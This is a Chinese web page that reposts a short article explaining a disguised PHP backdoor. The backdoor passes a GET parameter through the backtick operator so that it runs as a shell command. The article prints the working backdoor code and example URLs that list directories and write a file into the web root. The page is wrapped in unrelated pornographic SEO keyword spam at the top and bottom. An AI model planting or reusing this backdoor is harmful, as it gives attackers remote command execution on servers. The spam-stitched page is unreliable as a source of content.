天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

一個不易被發(fā)現(xiàn)的PHP后門代碼解析

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個一般的phper都不怎么關(guān)注的反撇號 ` ,反撇號包含的字符串,等同于shell_exec函數(shù)。

偽裝性很好,很容易被管理員忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

剛看到這段代碼我想大家都會說沒有問題,但是細(xì)心的朋友也會發(fā)現(xiàn)下面的變量被一個符號包起來了,既然是變量為什么要這樣了,

而且又不是單引號,這個就是關(guān)鍵所在了,這個符號是 Esc 下面的一個鍵(位于感嘆號!旁邊的),

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:/web/90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測試成功。

php技術(shù)一個不易被發(fā)現(xiàn)的PHP后門代碼解析,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 精品国产乱码久久久久久免费 | 毛片手机在线看 | 野花影院手机在线观看 | 中文字幕在线不卡日本v二区 | 性色AV一区二区三区V视界影院 | 国产成人精品系列在线观看 | 抽插妇女疯狂视频 | 高清国产mv视频在线观看 | 久久99视热频国只有精品 | 好看的电影网站亚洲一区 | 亚瑟天堂久久一区二区影院 | 欧美AAAA片免费播放观看 | 啪啪激情婷婷久久婷婷色五月 | 和尚扒开双腿蹂躏 | 欧美激情视频二区 | 亚洲欧美中文日韩视频 | 亚洲无遮挡 | 十八禁啪啦啪漫画 | 国产在线精品亚洲观看不卡欧美 | 视频在线免费观看 | 国产精品…在线观看 | 国产成人99久久亚洲综合精品 | 郭德纲于谦2012最新相声 | 国产精品久久久久精品A片软件 | 人妻免费久久久久久久了 | 快播电影网址 | 午夜快车神马影视 | 免费国产成人高清在线观看视频 | 插我一区二区在线观看 | 国产精品成人不卡在线观看 | 久久精品国产亚洲精品2020 | 欧美重口绿帽video | 久久青青草原综合伊人 | 色狠狠色综合吹潮 | 中文字AV字幕在线观看 | 秋霞伦理机在线看片 | 欧美极限扩肛 | 在线观看亚洲专区5555 | 国产手机精品一区二区 | 果冻传媒视频在线观看完整版免费 | 99久久国产露脸国语对白 |